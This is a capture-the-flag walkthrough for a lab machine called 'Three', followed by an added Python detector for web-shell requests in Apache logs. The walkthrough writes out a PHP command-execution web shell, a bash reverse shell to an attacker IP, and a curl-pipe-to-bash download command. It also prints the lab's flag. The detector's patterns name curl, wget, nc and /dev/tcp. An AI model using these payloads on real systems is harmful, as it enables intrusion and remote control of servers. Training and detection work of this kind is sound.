Three
Initial Scan
nmap -sV -T4 -v 10.129.232.222
Starting Nmap 7.80 ( https://nmap.org ) at 2022-09-16 18:35 EDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 18:35
Scanning 10.129.232.222 [2 ports]
Completed Ping Scan at 18:35, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:35
Completed Parallel DNS resolution of 1 host. at 18:35, 0.08s elapsed
Initiating Connect Scan at 18:35
Scanning 10.129.232.222 [1000 ports]
Discovered open port 22/tcp on 10.129.232.222
Discovered open port 80/tcp on 10.129.232.222
Completed Connect Scan at 18:35, 0.71s elapsed (1000 total ports)
Initiating Service scan at 18:35
Scanning 2 services on 10.129.232.222
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 18:35 (0:00:06 remaining)
Completed Service scan at 18:35, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.232.222.
Initiating NSE at 18:35
Completed NSE at 18:35, 0.26s elapsed
Initiating NSE at 18:35
Completed NSE at 18:35, 0.20s elapsed
Nmap scan report for 10.129.232.222
Host is up (0.045s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.98 seconds
Task 1
How many TCP ports are open?
Found in the initial scan.
Answer: 2
Task 2
What is the domain of the email address provided in the "Contact" section of the website?
Port 80 is open on the target. Browsing to the website and opening the Contact section shows the email address.
Answer: thetoppers.htb
Task 3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
General knowledge. The hosts file on various systems can be used in lieu of a DNS server for internally hosted names.
Answer: /etc/hosts
Task 4
Which sub-domain is discovered during further enumeration?
After editing the hosts file to map the IP to the domain, we can use Gobuster to help enumerate the site.
Answer: s3.thetoppers.htb
Task 5
Which service is running on the discovered sub-domain?
The subdomain is s3, which is Amazon's storage service; googling "s3 subdomain" confirms this.
Answer: Amazon S3
Task 6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
Knowing it's Amazon S3, what can we use to interact with it? Googling "Interact with Amazon S3" will give us our result.
Answer: awscli
Task 7
Which command is used to set up the AWS CLI installation?
aws help will give us our answer.
Answer: aws configure
Task 8
What is the command used by the above utility to list all of the S3 buckets?
After configuring aws, we can look at the S3 documentation.
Answer: aws s3 ls
Task 9
This server is configured to run files written in what web scripting language?
Looking at the buckets with: aws --endpoint=http://s3.thetoppers.htb s3 ls
we can go into this further: aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
From this listing we can see the site uses PHP.
Answer: PHP
Task 10
Submit Root Flag
So, knowing it runs on PHP and Amazon S3, we are going to work on getting a remote shell. Googling "get shell with php" I see we can use the system() function, which takes the URL parameter cmd as input and executes it as a system command.
echo '<?php system($_GET["cmd"]); ?>' > shell.php
With the shell file created, we can use cp to get the file onto the server and then run commands through the cmd parameter.
Confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php.
We are met with: uid=33(www-data) gid=33(www-data) groups=33(www-data), the output of the OS command id.
Now let's make a reverse shell script:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.119/1337 0>&1
Open a netcat listener with nc -nvlp 1337.
Now open a temporary web server to pull our script from: python3 -m http.server 8081
Now we can use curl to get our script onto the server and execute it:
http://thetoppers.htb/shell.php?cmd=curl%20%3C10.10.14.119%3E:8081/shell.sh|bash
We now have our reverse shell.
Now we can locate the flag and cat its contents.
Answer: a980d99281a28d638ac68b9bf9453c2b
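From the defender's side, the whole chain above (a PHP file dropped into the web root through the writable bucket, then driven via ?cmd=) leaves a clear trail in the Apache access log. The following is an added example, not part of the original walkthrough: a small detector that parses combined-format log lines and flags requests whose query parameters look like web-shell control (a cmd-style parameter, or a value carrying shell metacharacters or download tools). The log lines are constructed to mirror the requests in the write-up; the parameter names and patterns are assumptions, not an authoritative signature set.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines modelled on the walkthrough's requests
# (placeholder data, not a real capture).
SAMPLE_LOG = """\
10.10.14.119 - - [16/Sep/2022:18:40:01 -0400] "GET /index.php HTTP/1.1" 200 11952 "-" "Mozilla/5.0"
10.10.14.119 - - [16/Sep/2022:18:41:10 -0400] "GET /shell.php?cmd=id HTTP/1.1" 200 53 "-" "curl/7.81.0"
10.10.14.119 - - [16/Sep/2022:18:42:30 -0400] "GET /shell.php?cmd=curl%2010.10.14.119:8081/shell.sh|bash HTTP/1.1" 200 0 "-" "curl/7.81.0"
10.10.14.119 - - [16/Sep/2022:18:43:00 -0400] "GET /images/band.jpg HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Parameter names commonly used by one-line PHP shells (assumed list, extend as needed).
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
# Metacharacters and tools that indicate the value is being handed to system().
DANGEROUS = re.compile(r"(\|\s*(ba)?sh\b|/dev/tcp/|\bcurl\b|\bwget\b|\bnc\b|;|&&|\$\()")


def score_request(target):
    """Return the reasons (possibly none) a request target looks like web-shell use."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # values are URL-decoded here
    reasons = []
    for name, values in params.items():
        if name.lower() in SHELL_PARAMS:
            reasons.append(f"shell-style parameter '{name}'")
            for value in values:
                if DANGEROUS.search(value):
                    reasons.append(f"command payload in '{name}': {value}")
    return reasons


def find_webshell_hits(log_text):
    """Parse each log line and keep those whose query string scores as suspicious."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format requests
        reasons = score_request(m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["target"], "->", "; ".join(hit["reasons"]))
```

Pairing this with an alert on any new .php object landing in the bucket-backed web root catches the upload step as well as the execution step.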